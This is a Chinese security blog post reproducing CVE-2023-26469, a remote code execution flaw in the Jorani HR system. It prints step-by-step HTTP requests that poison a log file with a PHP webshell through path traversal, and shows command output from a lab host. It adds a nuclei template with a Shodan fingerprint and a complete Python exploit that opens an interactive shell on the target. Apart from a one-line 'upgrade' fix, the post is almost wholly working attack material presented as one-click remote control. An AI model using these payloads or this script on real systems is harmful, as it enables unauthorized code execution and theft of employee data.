免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
Jorani远程命令执行漏洞
02
—
漏洞影响
Jorani < 1.0.2
03
—
漏洞描述
Jorani 是一款开源的人力资源(HR)管理系统,旨在帮助组织更好地管理员工的休假、请假、加班和其他人事管理任务。这个系统提供了一个用户友好的Web界面,允许员工和管理人员轻松地提交、审批和跟踪休假请求,同时也提供了一些人事管理功能,如员工档案管理和报告生成。在 Jorani 1.0.0 中,攻击者可以利用路径遍历来访问文件并在服务器上执行代码。
04
—
title="Jorani"
05
—
漏洞复现
第一步,访问靶场/session/login拿到Cookie
GET /session/login HTTP/1.1Host: 192.168.190.30User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36Connection: closeAccept-Encoding: gzip
响应内容如下,其中csrf_cookie_jorani用于后续请求
HTTP/1.1 200 OKConnection: closeCache-Control: no-store, no-cache, must-revalidateContent-Type: text/html; charset=UTF-8Date: Tue, 24 Oct 2023 09:34:28 GMTExpires: Thu, 19 Nov 1981 08:52:00 GMTLast-Modified: Tue, 24 Oct 2023 09:34:28 GMTPragma: no-cacheServer: Apache/2.4.54 (Debian)Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnlyVary: Accept-Encoding
第二步,向靶场发送POST请求,执行函数并进行base64编码
POST /session/login HTTP/1.1Host: 192.168.190.30User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36Connection: closeContent-Length: 252Content-Type: application/x-www-form-urlencodedCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99rAccept-Encoding: gzipcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
第三步,向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
GET /pages/view/log-2023-10-24 HTTP/1.1Host: 192.168.190.30User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Connection: closeCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99rK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=X-REQUESTED-WITH: XMLHttpRequestAccept-Encoding: gzip
响应数据包如下,其中包含了uid=33(www-data) gid=33(www-data) groups=33(www-data)
HTTP/1.1 401 UnauthorizedConnection: closeContent-Length: 7043Cache-Control: no-store, no-cache, must-revalidateContent-Type: text/html; charset=UTF-8Date: Tue, 24 Oct 2023 09:34:29 GMTExpires: Thu, 19 Nov 1981 08:52:00 GMTLast-Modified: Tue, 24 Oct 2023 09:34:29 GMTPragma: no-cacheServer: Apache/2.4.54 (Debian)Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:29 GMT; Max-Age=7200; path=/Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:29 GMT; Max-Age=7200; path=/; HttpOnly<html lang="../../application/logs"><head><meta name="viewport" content="width=device-width, initial-scale=1">...ERROR - 2023-10-24 11:33:37 --> {controllers/session/login} Invalid login id or password for user=---------uid=33(www-data) gid=33(www-data) groups=33(www-data)---------
证明命令执行成功
06
—
nuclei poc
nuclei中已经有该POC了。
poc核心内容如下
id: CVE-2023-26469info:name: Jorani 1.0.0 - Remote Code Executionauthor: pussycat0xseverity: criticaldescription: |Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.remediation: |Upgrade Jorani to a patched version or apply the necessary security patches.metadata:verified: truemax-request: 3vendor: joraniproduct: joranishodan-query: http.favicon.hash:-2032163853tags: cve,cve2023,jorani,rce,packetstormvariables:cmd: "id"payload: "<?php if(isset($_SERVER['HTTP_{{header}}'])){system(base64_decode($_SERVER['HTTP_{{header}}']));} ?>"header: "{{to_upper(rand_base(12))}}"http:- raw:- |GET /session/login HTTP/1.1Host: {{Hostname}}- |POST /session/login HTTP/1.1Host: {{Hostname}}Content-Type: application/x-www-form-urlencodedcsrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword- |GET /pages/view/log-{{date_time("%Y-%M-%D")}} HTTP/1.1Host: {{Hostname}}X-REQUESTED-WITH: XMLHttpRequest{{header}}: {{base64("echo ---------;{{cmd}} 2>&1;echo ---------;")}}cookie-reuse: truematchers-condition: andmatchers:- type: regexpart: body_3regex:- 'uid=(d+)(.*?) gid=(d+)(.*?) groups=([d,]+)(.*?)'- type: statuspart: header_3status:- 401extractors:- type: regexpart: bodygroup: 1internal: truename: csrfregex:- 'name="csrf_test_jorani" value="(.*?)"'# digest: 4a0a004730450221008f4bc6475a44cede273521c31f6ca4732c6f9d7ca427b5f10f43ed1dfbb7343a02205247e6f125d2dbaab76d7cce782dc77567ec7a7675b8425fea61f8c666a511ea:922c64590222798bb761d5b6d8e72950
运行POC
.nuclei.exe -t C:UsersDELLnuclei-templateshttpcves2023CVE-2023-26469.yaml -l .1.txt
07
—
一键远控
github上有个开源的EXP
https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py运行
python CVE_Jorani.py https://192.168.190.30
exp文件内容如下
"""vulnerability covered by CVE-2023-26469"""import readlineimport requestsimport datetimeimport sysimport reimport base64import randomimport stringrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)msg = lambda x,y="n":print(f'x1b[92m[+]x1b[0m {x}', end=y)err = lambda x,y="n":print(f'x1b[91m[x]x1b[0m {x}', end=y)log = lambda x,y="n":print(f'x1b[93m[?]x1b[0m {x}', end=y)CSRF_PATTERN = re.compile('<input type="hidden" name="csrf_test_jorani" value="(.*?)"')CMD_PATTERN = re.compile('---------(.*?)---------', re.S)URLS = {'login' : '/session/login','view' : '/pages/view/',}alphabet = string.ascii_uppercaseHEADER_NAME = ''.join(random.choice(alphabet) for i in range(12))BypassRedirect = {'X-REQUESTED-WITH' : 'XMLHttpRequest',HEADER_NAME : ""}INPUT = "x1b[92mjrjgjkx1b[0m@x1b[41mjoranix1b[0m(PSEUDO-TERM)n$ " # The input used for the pseudo termu = lambda x,y: x + URLS[y]POISON_PAYLOAD = "<?php if(isset($_SERVER['HTTP_" + HEADER_NAME + "'])){system(base64_decode($_SERVER['HTTP_" + HEADER_NAME + "']));} ?>"PATH_TRAV_PAYLOAD = "../../application/logs"if __name__ == '__main__':print("""/!\ Do not use this if you are not authorized to /!\""")log("POC made by @jrjgjk (Guilhem RIOUX)", "nn")if(len(sys.argv) == 1):err(f"Usage: {sys.argv[0]} <url>")exit(0)log(f"Header used for exploit: {HEADER_NAME}")t = sys.argv[1]s = requests.Session()log("Requesting session cookie")res = s.get(u(t,"login"), verify = False)C = s.cookies.get_dict()Date = datetime.date.today()log_file_name = f"log-{Date.year}-{str(Date.month).zfill(2)}-{str(Date.day).zfill(2)}"csrf_token = re.findall(CSRF_PATTERN, res.text)[0]log(f"Poisonning log file with payload: '{POISON_PAYLOAD}'")log(f"Set path traversal to '{PATH_TRAV_PAYLOAD}'")msg(f"Recoveredd CSRF Token: {csrf_token}")data = {"csrf_test_jorani" : csrf_token,"last_page" : "session/login","language" : PATH_TRAV_PAYLOAD,"login" : POISON_PAYLOAD,"CipheredValue" : "DummyPassword"}s.post(u(t,"login"), data=data)log(f"Accessing log file: {log_file_name}")exp_page = t + URLS['view'] + log_file_name### Shellcmd = ""while True:cmd = input(INPUT)if(cmd in ['x', 'exit', 'quit']):breakelif(cmd == ""):continueelse:BypassRedirect[HEADER_NAME] = base64.b64encode(b"echo ---------;" + cmd.encode() + b" 2>&1;echo ---------;")res = s.get(exp_page, headers=BypassRedirect)cmdRes = re.findall(CMD_PATTERN, res.text)try:print(cmdRes[0])except:print(res.text)err("Wow, there was a problem, are you sure of the URL ??")err('exiting..')exit(0)
08
—
修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):Jorani远程命令执行漏洞一键远控(CVE-2023-26469)
